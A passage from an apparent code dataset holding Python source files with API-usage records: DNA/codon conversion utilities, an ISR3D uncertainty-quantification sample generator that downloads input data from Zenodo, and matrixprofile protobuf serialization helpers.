delimiter=',', fmt='%d')\n", (8044, 8085), True, 'import numpy as np\n'), ((8241, 8288), 'numpy.savetxt', 'np.savetxt', (['outfile', 'e'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, e, delimiter=',', fmt='%f')\n", (8251, 8288), True, 'import numpy as np\n'), ((8709, 8767), 'numpy.savetxt', 'np.savetxt', (['outfile', 'current_maps'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, current_maps, delimiter=',', fmt='%f')\n", (8719, 8767), True, 'import numpy as np\n'), ((8492, 8548), 'numpy.savetxt', 'np.savetxt', (['outfile', 'congestion'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, congestion, delimiter=',', fmt='%f')\n", (8502, 8548), True, 'import numpy as np\n'), ((3821, 3869), 'numpy.zeros', 'np.zeros', (['(3 * size_region_x, 3 * size_region_y)'], {}), '((3 * size_region_x, 3 * size_region_y))\n', (3829, 3869), True, 'import numpy as np\n'), ((3894, 3910), 'numpy.zeros', 'np.zeros', (['(9)', 'int'], {}), '(9, int)\n', (3902, 3910), True, 'import numpy as np\n'), ((7097, 7216), 'simulated_annealer.simulated_annealer', 'simulated_annealer', (['init_state', 'T_init', 'T_final', 'alpha_temp', 'num_moves_per_step', 'current_region', 'congestion_enabled'], {}), '(init_state, T_init, T_final, alpha_temp,\n num_moves_per_step, current_region, congestion_enabled)\n', (7115, 7216), False, 'from simulated_annealer import simulated_annealer\n'), ((4001, 4021), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (4015, 4021), False, 'import random\n')]
|
import numpy as np
class SequenceTools(object):
dna2gray_ = {'c': (0, 0), 't': (1, 0), 'g': (1, 1), 'a': (0, 1)}
gray2dna_ = {(0, 0): 'c', (1, 0): 't', (1, 1): 'g', (0, 1): 'a'}
codon2protein_ = {'ttt': 'f', 'ttc': 'f', 'tta': 'l', 'ttg': 'l', 'tct': 's', 'tcc': 's', 'tca': 's',
'tcg': 's', 'tat': 'y', 'tac': 'y', 'taa': '!', 'tag': '!', 'tgt': 'c', 'tgc': 'c',
'tga': '!', 'tgg': 'w', 'ctt': 'l', 'ctc': 'l', 'cta': 'l', 'ctg': 'l', 'cct': 'p',
'ccc': 'p', 'cca': 'p', 'ccg': 'p', 'cat': 'h', 'cac': 'h', 'caa': 'q', 'cag': 'q',
'cgt': 'r', 'cgc': 'r', 'cga': 'r', 'cgg': 'r', 'att': 'i', 'atc': 'i', 'ata': 'i',
'atg': 'm', 'act': 't', 'acc': 't', 'aca': 't', 'acg': 't', 'aat': 'n', 'aac': 'n',
'aaa': 'k', 'aag': 'k', 'agt': 's', 'agc': 's', 'aga': 'r', 'agg': 'r', 'gtt': 'v',
'gtc': 'v', 'gta': 'v', 'gtg': 'v', 'gct': 'a', 'gcc': 'a', 'gca': 'a', 'gcg': 'a',
'gat': 'd', 'gac': 'd', 'gaa': 'e', 'gag': 'e', 'ggt': 'g', 'ggc': 'g', 'gga': 'g',
'ggg': 'g'}
protein2codon_ = {
'l': ['tta', 'ttg', 'ctt', 'ctc', 'cta', 'ctg'],
's': ['tct', 'tcc', 'tca', 'tcg', 'agt', 'agc'],
'r': ['cgt', 'cgc', 'cga', 'cgg', 'aga', 'agg'],
'v': ['gtt', 'gtc', 'gta', 'gtg'],
'a': ['gct', 'gcc', 'gca', 'gcg'],
'p': ['cct', 'ccc', 'cca', 'ccg'],
't': ['act', 'acc', 'aca', 'acg'],
'g': ['ggt', 'ggc', 'gga', 'ggg'],
'stop': ['taa', 'tag', 'tga'],
'i': ['att', 'atc', 'ata'],
'y': ['tat', 'tac'],
'f': ['ttt', 'ttc'],
'c': ['tgt', 'tgc'],
'h': ['cat', 'cac'],
'q': ['caa', 'cag'],
'n': ['aat', 'aac'],
'k': ['aaa', 'aag'],
'd': ['gat', 'gac'],
'e': ['gaa', 'gag'],
'w': ['tgg'],
'm': ['atg']
}
protein2constraint_ = {
'l': {(1,): {('t',)}, (0, 2): {('t', 'a'), ('t', 'g'), ('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g')}},
's': {(0, 1, 2): {('t', 'c', 't'), ('t', 'c', 'c'), ('t', 'c', 'a'), ('t', 'c', 'g'), ('a', 'g', 't'),
('a', 'g', 'c')}},
'r': {(1,): {('g',)}, (0, 2): {('c', 't'), ('c', 'c'), ('c', 'a'), ('c', 'g'), ('a', 'a'), ('a', 'g')}},
'v': {(0,): {('g',)}, (1,): {('t',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'a': {(0,): {('g',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'p': {(0,): {('c',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
't': {(0,): {('a',)}, (1,): {('c',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'g': {(0,): {('g',)}, (1,): {('g',)}, (2,): {('g',), ('t',), ('a',), ('c',)}},
'stop': {(0,): {('t',)}, (1, 2): {('a', 'a'), ('a', 'g'), ('g', 'a')}},
'i': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('t',), ('a',), ('c',)}},
'y': {(0,): {('t',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'f': {(0,): {('t',)}, (1,): {('t',)}, (2,): {('t',), ('c',)}},
'c': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('t',), ('c',)}},
'h': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'q': {(0,): {('c',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'n': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'k': {(0,): {('a',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'd': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('t',), ('c',)}},
'e': {(0,): {('g',)}, (1,): {('a',)}, (2,): {('a',), ('g',)}},
'w': {(0,): {('t',)}, (1,): {('g',)}, (2,): {('g',)}},
'm': {(0,): {('a',)}, (1,): {('t',)}, (2,): {('g',)}},
}
# Integer mapping from Fernandes and Vinga (2016)
codon2idx_ = {'aaa': 1, 'aac': 2, 'aag': 3, 'aat': 4, 'aca': 5, 'acc': 6, 'acg': 7, 'act': 8, 'aga': 9,
'agc': 10, 'agg': 11, 'agt': 12, 'ata': 13, 'atc': 14, 'atg': 15, 'att': 16, 'caa': 17,
'cac': 18, 'cag': 19, 'cat': 20, 'cca': 21, 'ccc': 22, 'ccg': 23, 'cct': 24, 'cga': 25,
'cgc': 26, 'cgg': 27, 'cgt': 28, 'cta': 29, 'ctc': 30, 'ctg': 31, 'ctt': 32, 'gaa': 33,
'gac': 34, 'gag': 35, 'gat': 36, 'gca': 37, 'gcc': 38, 'gcg': 39, 'gct': 40, 'gga': 41,
'ggc': 42, 'ggg': 43, 'ggt': 44, 'gta': 45, 'gtc': 46, 'gtg': 47, 'gtt': 48, 'taa': 49,
'tac': 50, 'tag': 51, 'tat': 52, 'tca': 53, 'tcc': 54, 'tcg': 55, 'tct': 56, 'tga': 57,
'tgc': 58, 'tgg': 59, 'tgt': 60, 'tta': 61, 'ttc': 62, 'ttg': 63, 'ttt': 64}
@staticmethod
def convert_dna_to_rna(seq):
dna2rna = {'t': 'u', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([dna2rna[s] for s in seq])
@staticmethod
def convert_dna_arr_to_str(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into length N string """
dna_seq_str = ''
for i in range(dna_arr.shape[0]):
token = np.argmax(dna_arr[i, :])
dna_seq_str += base_order[token]
return dna_seq_str
@staticmethod
def get_aa_codons():
aa_list = sorted(list(SequenceTools.protein2codon_.keys()))
aa_codons = np.zeros((len(aa_list), 6, 3, 4))
i = 0
for aa in aa_list:
cods = SequenceTools.protein2codon_[aa]
j = 0
for c in cods:
cod_arr = SequenceTools.convert_dna_str_to_arr(c)
aa_codons[i, j] = cod_arr
j += 1
i += 1
return aa_codons
@staticmethod
def convert_dna_str_to_arr(dna_str, base_order='ATCG'):
""" Convert length N string into N x 4 tokenized array"""
dna_str = dna_str.upper()
N = len(dna_str)
dna_arr = np.zeros((N, 4))
for i in range(N):
idx = base_order.index(dna_str[i])
dna_arr[i, idx] = 1.
return dna_arr
@staticmethod
def convert_dna_arr_to_gray(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into 2N x 2 tokenized gray code array"""
N = dna_arr.shape[0]
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
token = np.argmax(dna_arr[i, :])
dna_i = base_order[token]
gray_i = SequenceTools.dna2gray_[dna_i]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_gray_to_dna_str(gray_arr):
Ngray = gray_arr.shape[0]
dna_str = ''
i = 0
while i < Ngray:
g1 = int(np.argmax(gray_arr[i, :]))
g2 = int(np.argmax(gray_arr[i + 1, :]))
dna_str += SequenceTools.gray2dna_[(g1, g2)]
i += 2
return dna_str
@staticmethod
def convert_dna_str_to_gray(dna_str):
"""Convert length N string into 2N x 2 tokenized gray code array"""
dna_str = dna_str.lower()
N = len(dna_str)
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
gray_i = SequenceTools.dna2gray_[dna_str[i]]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_rna_to_dna(seq):
rna2dna = {'u': 't', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([rna2dna[s] for s in seq])
@classmethod
def get_codon_from_idx(cls, idx):
idx2codon = {val: key for key, val in SequenceTools.codon2idx_.items()}
return idx2codon[idx]
@classmethod
def get_start_codon_int(cls):
return SequenceTools.codon2idx_['atg']
@classmethod
def get_stop_codon_ints(cls):
stop_codons = SequenceTools.protein2codon_['stop']
return [SequenceTools.codon2idx_[s] for s in stop_codons]
@classmethod
def translate_dna_str(cls, dna_seq):
dna_seq = dna_seq.lower()
prot_seq = []
i = 0
while i < len(dna_seq):
cod = dna_seq[i:i + 3]
prot_seq.append(SequenceTools.codon2protein_[cod])
i += 3
prot_seq = "".join(prot_seq)
return prot_seq
|
[
"numpy.zeros",
"numpy.argmax"
] |
[((5834, 5850), 'numpy.zeros', 'np.zeros', (['(N, 4)'], {}), '((N, 4))\n', (5842, 5850), True, 'import numpy as np\n'), ((6192, 6212), 'numpy.zeros', 'np.zeros', (['(2 * N, 2)'], {}), '((2 * N, 2))\n', (6200, 6212), True, 'import numpy as np\n'), ((7051, 7071), 'numpy.zeros', 'np.zeros', (['(2 * N, 2)'], {}), '((2 * N, 2))\n', (7059, 7071), True, 'import numpy as np\n'), ((5036, 5060), 'numpy.argmax', 'np.argmax', (['dna_arr[i, :]'], {}), '(dna_arr[i, :])\n', (5045, 5060), True, 'import numpy as np\n'), ((6260, 6284), 'numpy.argmax', 'np.argmax', (['dna_arr[i, :]'], {}), '(dna_arr[i, :])\n', (6269, 6284), True, 'import numpy as np\n'), ((6658, 6683), 'numpy.argmax', 'np.argmax', (['gray_arr[i, :]'], {}), '(gray_arr[i, :])\n', (6667, 6683), True, 'import numpy as np\n'), ((6706, 6735), 'numpy.argmax', 'np.argmax', (['gray_arr[i + 1, :]'], {}), '(gray_arr[i + 1, :])\n', (6715, 6735), True, 'import numpy as np\n')]
|
import subprocess
lib_list = ['numpy','ymmsl','sobol_seq','csv','seaborn','zenodo_get']
for lib_name in lib_list:
try:
import lib_name
except ImportError:
if lib_name == 'csv':
print(lib_name,' Module not installed')
subprocess.run(['pip','install','python-csv'])
else:
print(lib_name,' Module not installed')
subprocess.run(['pip','install','%s'%lib_name])
import numpy as np
import ymmsl
import sobol_seq
import csv
import os
import seaborn as sns
import zenodo_get
# Transform the normalized sample matrix to ranges of uncertain parameters
def dim_transform(sobol_vector,uncertain_list):
dim = len(uncertain_list)
for num_dim in range(dim):
para_max = uncertain_list[num_dim].get('max')
para_min = uncertain_list[num_dim].get('min')
sobol_vector[:,num_dim] = para_min + (para_max-para_min)*sobol_vector[:,num_dim]
return sobol_vector
####################################################################################
##### Sample generation and UQ campaign creation (including instances folder)#######
####################################################################################
# Note:
# This is used to generate UQ samples for only four biological parameters:
# 1) Endothelium endpoint 2)smc max stran 3)balloon extension 4) Fenestration probability
# Naming of Folder and files for samples
# Level 0: UQtest (UQ campaign name)
# Level 1: UQtest/A (sample matrix of sobol sequence)
# Level 2: UQtest/A/A_X where X vary from 1 -> N (N: number of samples)
# Level 3: UQtest/A/A_X/input.ymmsl
### Main function
# Number of samples for UQ
# Note that ISR3D is a computationally intensive application.
# Running 128 instances would need some cluster resources
# You can start with a small number, 16 for instances.
NumSample = 128
# Template path to the ymmsl file (relative path from ISR3D/Result/UQtest/ to ISR3D/UQ/template/input_stage4.ymmsl)
input_path = '../../UQ/template/'
input_ymmsl_filename = 'input_stage4.ymmsl'
# Output directory for UQ campagin folder and name
output_path = './'
experiment_name = 'UQtest'
# Read in the data of template ymmsl file
with open(input_path+input_ymmsl_filename,'r') as f:
ymmsl_data = ymmsl.load(f)
# Take out the unchanged model part and need-for-change settings part for ymmsl model
model = ymmsl_data.model
settings = ymmsl_data.settings
# Set uncertain parameters and its ranges as a list
ymmsl_uncertain_parameters = [
{
'name': 'smc.endo_endpoint',
'min': 10.0,
'max': 20.0
},
{
'name': 'smc.balloon_extension',
'min': 0.5,
'max': 1.5
},
{
'name': 'smc.smc_max_strain',
'min': 1.2,
'max': 1.8
},
{
'name': 'smc.fenestration_probability',
'min': 0.0,# Calculate the lumen volume from (lumen_area_of_each_slice*depth_of_slice)
'max': 0.1
}]
# Count the total uncertain input dimensions (here 4 parameters)
num_uncer_para = len(ymmsl_uncertain_parameters)
print('Number of uncertain parameter: '+str(num_uncer_para))
# Generate sobel sequence range (0,1), save the file and transform to (min,max)
A = sobol_seq.i4_sobol_generate(num_uncer_para,NumSample)
A = dim_transform(A,ymmsl_uncertain_parameters)
np.savetxt("A.csv",A)
# Create corresponding directory and folders
try:
os.mkdir(output_path+experiment_name)
except OSError:
print ("Creation of the directory %s failed" % output_path+experiment_name)
else:
print ("Successfully created the directory %s" % output_path+experiment_name)
# A: Replace the corresponding value within the dict and output the file
os.mkdir(output_path+experiment_name+'/A')
checklist = ['A']
for n in range(NumSample):
sample_path = output_path+experiment_name+'/A'+'/A_'+str(n)
os.mkdir(sample_path)
# Generate file for ymmsl
num_para = 0
for para in ymmsl_uncertain_parameters:
settings[para.get('name')] = float(A[n,num_para])
num_para = num_para + 1
config = ymmsl.Configuration(model, settings, None, None)
with open(sample_path+'/input_stage4.ymmsl', 'w') as f:
ymmsl.save(config, f)
print('ymmsl input for each UQ instance has been generated')
####################################################################################
##### Run shell script to broadcast other input files to each sample folder#########
####################################################################################
import subprocess
# Download Other input files from Zenodo
print('Start to download other input files for ISR3D from Zenodo')
subprocess.run(['wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat'],shell = True)
subprocess.run(['wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat'],shell = True)
subprocess.run(['wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv'],shell = True)
print('Start to broadcast the input to each UQ instance directory')
# Template path to the ymmsl file (relative path from ISR3D/Result/UQtest/ to ISR3D/UQ/function/BCastStage3.sh)
pass_arg = str(NumSample)
subprocess.run(['bash','../../UQ/function/BCastStage3.sh', '%s'%pass_arg])
print('Sample generation done')
|
[
"ymmsl.load",
"ymmsl.save",
"ymmsl.Configuration",
"subprocess.run",
"os.mkdir",
"numpy.savetxt",
"sobol_seq.i4_sobol_generate"
] |
[((3344, 3398), 'sobol_seq.i4_sobol_generate', 'sobol_seq.i4_sobol_generate', (['num_uncer_para', 'NumSample'], {}), '(num_uncer_para, NumSample)\n', (3371, 3398), False, 'import sobol_seq\n'), ((3446, 3468), 'numpy.savetxt', 'np.savetxt', (['"""A.csv"""', 'A'], {}), "('A.csv', A)\n", (3456, 3468), True, 'import numpy as np\n'), ((3820, 3866), 'os.mkdir', 'os.mkdir', (["(output_path + experiment_name + '/A')"], {}), "(output_path + experiment_name + '/A')\n", (3828, 3866), False, 'import os\n'), ((4791, 4899), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/stage3.test_vessel.dat'],\n shell=True)\n", (4805, 4899), False, 'import subprocess\n'), ((4892, 5004), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/stage3.test_vessel_nb.dat'\n ], shell=True)\n", (4906, 5004), False, 'import subprocess\n'), ((4996, 5109), 'subprocess.run', 'subprocess.run', (["['wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv']"], {'shell': '(True)'}), "([\n 'wget https://zenodo.org/record/4603912/files/test_vessel_centerline.csv'\n ], shell=True)\n", (5010, 5109), False, 'import subprocess\n'), ((5307, 5384), 'subprocess.run', 'subprocess.run', (["['bash', '../../UQ/function/BCastStage3.sh', '%s' % pass_arg]"], {}), "(['bash', '../../UQ/function/BCastStage3.sh', '%s' % pass_arg])\n", (5321, 5384), False, 'import subprocess\n'), ((2312, 2325), 'ymmsl.load', 'ymmsl.load', (['f'], {}), '(f)\n', (2322, 2325), False, 'import ymmsl\n'), ((3523, 3562), 'os.mkdir', 'os.mkdir', (['(output_path + experiment_name)'], {}), '(output_path + experiment_name)\n', (3531, 3562), False, 'import os\n'), ((3977, 3998), 'os.mkdir', 'os.mkdir', (['sample_path'], {}), '(sample_path)\n', (3985, 3998), False, 'import os\n'), ((4208, 4256), 'ymmsl.Configuration', 'ymmsl.Configuration', (['model', 'settings', 'None', 'None'], {}), '(model, settings, None, None)\n', (4227, 4256), False, 'import ymmsl\n'), ((4325, 4346), 'ymmsl.save', 'ymmsl.save', (['config', 'f'], {}), '(config, f)\n', (4335, 4346), False, 'import ymmsl\n'), ((229, 277), 'subprocess.run', 'subprocess.run', (["['pip', 'install', 'python-csv']"], {}), "(['pip', 'install', 'python-csv'])\n", (243, 277), False, 'import subprocess\n'), ((331, 382), 'subprocess.run', 'subprocess.run', (["['pip', 'install', '%s' % lib_name]"], {}), "(['pip', 'install', '%s' % lib_name])\n", (345, 382), False, 'import subprocess\n')]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
range = getattr(__builtins__, 'xrange', range)
# end of py2 compatability boilerplate
import numpy as np
from matrixprofile import core
from matrixprofile.io.protobuf.proto_messages_pb2 import (
Location, Motif, MPFOutput
)
def get_matrix_attributes(matrix):
"""
Utility function to extract the rows, cols and flattened array from a
numpy array so it can be stored in the MPFOutput protobuf message.
Parameters
----------
matrix : np.ndarray
The numpy array to extract the attributes from.
Returns
-------
tuple :
A tuple containing the rows, cols and flattened array.
"""
if not core.is_array_like(matrix) or len(matrix) < 1:
return None, None, None
rows = matrix.shape[0]
cols = 0
if len(matrix.shape) > 1:
cols = matrix.shape[1]
return rows, cols, matrix.flatten()
def get_windows(profile):
"""
Utility function to format the windows from a profile structure ensuring
that the windows are in an array.
Parameters
----------
profile : dict
The MatrixProfile or PMP profile.
Returns
-------
list :
The window(s) in a list.
"""
windows = []
if core.is_mp_obj(profile):
windows.append(profile.get('w'))
elif core.is_pmp_obj(profile):
windows = profile.get('windows')
return windows
def get_proto_motif(motif):
"""
Utility function to convert a motif from a MatrixProfile or PMP structure
ensuring that it is compatible with the MPFOutput message.
Note
----
A single dimensional motif location will only have a row index and
a column index of 0.
Parameters
----------
motif : dict
The motif to convert.
Returns
-------
Motif :
The motif object for MPFOutput message.
"""
out_motif = Motif()
for indices in motif['motifs']:
tmp = Location()
tmp.row = 0
tmp.col = 0
# handle single integer location
if core.is_array_like(indices):
tmp.row = indices[0]
tmp.col = indices[1]
else:
tmp.row = indices
out_motif.motifs.append(tmp)
for neighbor in motif['neighbors']:
tmp = Location()
tmp.row = 0
tmp.col = 0
# handle single integer location
if core.is_array_like(neighbor):
tmp.row = neighbor[0]
tmp.col = neighbor[1]
else:
tmp.row = neighbor
out_motif.neighbors.append(tmp)
return out_motif
def get_proto_discord(discord):
"""
Utility function to convert a discord into the MPFOutput message
format.
Note
----
A single dimensional discord location will only have a row index and
a column index of 0.
Parameters
----------
discord : int or tuple
The discord with row, col index or single index.
Returns
-------
Location :
The Location message used in the MPFOutput protobuf message.
"""
out_discord = Location()
out_discord.row = 0
out_discord.col = 0
if core.is_array_like(discord):
out_discord.row = discord[0]
out_discord.col = discord[1]
else:
out_discord.row = discord
return out_discord
def profile_to_proto(profile):
"""
Utility function that takes a MatrixProfile or PMP profile data structure
and converts it to the MPFOutput protobuf message object.
Parameters
----------
profile : dict
The profile to convert.
Returns
-------
MPFOutput :
The MPFOutput protobuf message object.
"""
output = MPFOutput()
# add higher level attributes that work for PMP and MP
output.klass = profile.get('class')
output.algorithm = profile.get('algorithm')
output.metric = profile.get('metric')
output.sample_pct = profile.get('sample_pct')
# add time series data
ts = profile.get('data').get('ts')
query = profile.get('data').get('query')
rows, cols, data = get_matrix_attributes(ts)
output.ts.rows = rows
output.ts.cols = cols
output.ts.data.extend(data)
# add query data
query = profile.get('data').get('query')
rows, cols, data = get_matrix_attributes(query)
if rows and cols and core.is_array_like(data):
output.query.rows = rows
output.query.cols = cols
output.query.data.extend(data)
# add window(s)
output.windows.extend(get_windows(profile))
# add motifs
motifs = profile.get('motifs')
if not isinstance(motifs, type(None)):
for motif in motifs:
output.motifs.append(get_proto_motif(motif))
# add discords
discords = profile.get('discords')
if not isinstance(discords, type(None)):
for discord in discords:
output.discords.append(get_proto_discord(discord))
# add cmp
cmp = profile.get('cmp')
if not isinstance(cmp, type(None)):
rows, cols, data = get_matrix_attributes(cmp)
output.cmp.rows = rows
output.cmp.cols = cols
output.cmp.data.extend(data)
# add av
av = profile.get('av')
if not isinstance(av, type(None)):
rows, cols, data = get_matrix_attributes(av)
output.av.rows = rows
output.av.cols = cols
output.av.data.extend(data)
# add av_type
av_type = profile.get('av_type')
if not isinstance(av_type, type(None)) and len(av_type) > 0:
output.av_type = av_type
# add the matrix profile specific attributes
if core.is_mp_obj(profile):
output.mp.ez = profile.get('ez')
output.mp.join = profile.get('join')
# add mp
rows, cols, data = get_matrix_attributes(profile.get('mp'))
output.mp.mp.rows = rows
output.mp.mp.cols = cols
output.mp.mp.data.extend(data)
# add pi
rows, cols, data = get_matrix_attributes(profile.get('pi'))
output.mp.pi.rows = rows
output.mp.pi.cols = cols
output.mp.pi.data.extend(data)
# add lmp
rows, cols, data = get_matrix_attributes(profile.get('lmp'))
if rows and cols and core.is_array_like(data):
output.mp.lmp.rows = rows
output.mp.lmp.cols = cols
output.mp.lmp.data.extend(data)
# add lpi
rows, cols, data = get_matrix_attributes(profile.get('lpi'))
if rows and cols and core.is_array_like(data):
output.mp.lpi.rows = rows
output.mp.lpi.cols = cols
output.mp.lpi.data.extend(data)
# add rmp
rows, cols, data = get_matrix_attributes(profile.get('rmp'))
if rows and cols and core.is_array_like(data):
output.mp.rmp.rows = rows
output.mp.rmp.cols = cols
output.mp.rmp.data.extend(data)
# add rpi
rows, cols, data = get_matrix_attributes(profile.get('rpi'))
if rows and cols and core.is_array_like(data):
output.mp.rpi.rows = rows
output.mp.rpi.cols = cols
output.mp.rpi.data.extend(data)
# add the pan matrix profile specific attributes
elif core.is_pmp_obj(profile):
# add pmp
rows, cols, data = get_matrix_attributes(profile.get('pmp'))
output.pmp.pmp.rows = rows
output.pmp.pmp.cols = cols
output.pmp.pmp.data.extend(data)
# add pmpi
rows, cols, data = get_matrix_attributes(profile.get('pmpi'))
output.pmp.pmpi.rows = rows
output.pmp.pmpi.cols = cols
output.pmp.pmpi.data.extend(data)
else:
raise ValueError('Expecting Pan-MatrixProfile or MatrixProfile!')
return output
def to_mpf(profile):
"""
Converts a given profile object into MPF binary file format.
Parameters
----------
profile : dict_like
A MatrixProfile or Pan-MatrixProfile data structure.
Returns
-------
str :
The profile as a binary formatted string.
"""
obj = profile_to_proto(profile)
return obj.SerializeToString()
def from_proto_to_array(value):
"""
Utility function to convert a protobuf array back into the correct
dimensions.
Parameters
----------
value : array_like
The array to transform.
Returns
-------
np.ndarray :
The transformed array.
"""
if isinstance(value, type(None)) or len(value.data) < 1:
return None
shape = (value.rows, value.cols)
out = np.array(value.data)
if shape[1] > 0:
out = out.reshape(shape)
return out
def discords_from_proto(discords, is_one_dimensional=False):
"""
Utility function to transform discord locations back to single dimension
or multi-dimension location.
Parameter
---------
discords : array_like
The protobuf formatted array.
is_one_dimensional : boolean
A flag to indicate if the original locations should be 1D.
Returns
-------
np.ndarray :
The transformed discord locations.
"""
out = []
for discord in discords:
if is_one_dimensional:
out.append(discord.row)
else:
out.append((discord.row, discord.col))
return np.array(out, dtype=int)
def motifs_from_proto(motifs, is_one_dimensional=False):
"""
Utility function to transform motif locations back to single dimension
or multi-dimension location.
Parameter
---------
motifs : array_like
The protobuf formatted array.
is_one_dimensional : boolean
A flag to indicate if the original locations should be 1D.
Returns
-------
list :
The transformed motif locations.
"""
out = []
for motif in motifs:
tmp = {'motifs': [], 'neighbors': []}
for location in motif.motifs:
if is_one_dimensional:
tmp['motifs'].append(location.row)
else:
tmp['motifs'].append((location.row, location.col))
for neighbor in motif.neighbors:
if is_one_dimensional:
tmp['neighbors'].append(neighbor.row)
else:
tmp['neighbors'].append((neighbor.row, neighbor.col))
out.append(tmp)
return out
def from_mpf(profile):
"""
Converts binary formatted MPFOutput message into a profile data structure.
Parameters
----------
profile : str
The profile as a binary formatted MPFOutput message.
Returns
-------
profile : dict_like
A MatrixProfile or Pan-MatrixProfile data structure.
"""
obj = MPFOutput()
obj.ParseFromString(profile)
out = {}
is_one_dimensional = False
# load in all higher level attributes
out['class'] = obj.klass
out['algorithm'] = obj.algorithm
out['metric'] = obj.metric
out['sample_pct'] = obj.sample_pct
out['data'] = {
'ts': from_proto_to_array(obj.ts),
'query': from_proto_to_array(obj.query)
}
if obj.klass == 'MatrixProfile':
out['mp'] = from_proto_to_array(obj.mp.mp)
out['pi'] = from_proto_to_array(obj.mp.pi)
out['lmp'] = from_proto_to_array(obj.mp.lmp)
out['lpi'] = from_proto_to_array(obj.mp.lpi)
out['rmp'] = from_proto_to_array(obj.mp.rmp)
out['rpi'] = from_proto_to_array(obj.mp.rpi)
out['ez'] = obj.mp.ez
out['join'] = obj.mp.join
out['w'] = obj.windows[0]
is_one_dimensional = len(out['mp'].shape) == 1
elif obj.klass == 'PMP':
out['pmp'] = from_proto_to_array(obj.pmp.pmp)
out['pmpi'] = from_proto_to_array(obj.pmp.pmpi)
out['windows'] = np.array(obj.windows)
if not isinstance(obj.discords, type(None)) and len(obj.discords) > 0:
out['discords'] = discords_from_proto(
obj.discords, is_one_dimensional=is_one_dimensional)
if not isinstance(obj.motifs, type(None)) and len(obj.motifs) > 0:
out['motifs'] = motifs_from_proto(
obj.motifs, is_one_dimensional=is_one_dimensional)
if not isinstance(obj.cmp, type(None)) and len(obj.cmp.data) > 0:
out['cmp'] = from_proto_to_array(obj.cmp)
if not isinstance(obj.av, type(None)) and len(obj.av.data) > 0:
out['av'] = from_proto_to_array(obj.av)
if not isinstance(obj.av_type, type(None)) and len(obj.av_type) > 0:
out['av_type'] = obj.av_type
return out
|
[
"matrixprofile.core.is_array_like",
"matrixprofile.io.protobuf.proto_messages_pb2.Location",
"matrixprofile.core.is_pmp_obj",
"numpy.array",
"matrixprofile.io.protobuf.proto_messages_pb2.Motif",
"matrixprofile.core.is_mp_obj",
"matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput"
] |
[((1392, 1415), 'matrixprofile.core.is_mp_obj', 'core.is_mp_obj', (['profile'], {}), '(profile)\n', (1406, 1415), False, 'from matrixprofile import core\n'), ((2035, 2042), 'matrixprofile.io.protobuf.proto_messages_pb2.Motif', 'Motif', ([], {}), '()\n', (2040, 2042), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((3230, 3240), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (3238, 3240), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((3297, 3324), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['discord'], {}), '(discord)\n', (3315, 3324), False, 'from matrixprofile import core\n'), ((3840, 3851), 'matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput', 'MPFOutput', ([], {}), '()\n', (3849, 3851), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((5743, 5766), 'matrixprofile.core.is_mp_obj', 'core.is_mp_obj', (['profile'], {}), '(profile)\n', (5757, 5766), False, 'from matrixprofile import core\n'), ((8684, 8704), 'numpy.array', 'np.array', (['value.data'], {}), '(value.data)\n', (8692, 8704), True, 'import numpy as np\n'), ((9430, 9454), 'numpy.array', 'np.array', (['out'], {'dtype': 'int'}), '(out, dtype=int)\n', (9438, 9454), True, 'import numpy as np\n'), ((10811, 10822), 'matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput', 'MPFOutput', ([], {}), '()\n', (10820, 10822), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((1467, 1491), 'matrixprofile.core.is_pmp_obj', 'core.is_pmp_obj', (['profile'], {}), '(profile)\n', (1482, 1491), False, 'from matrixprofile import core\n'), ((2094, 2104), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (2102, 2104), False, 'from 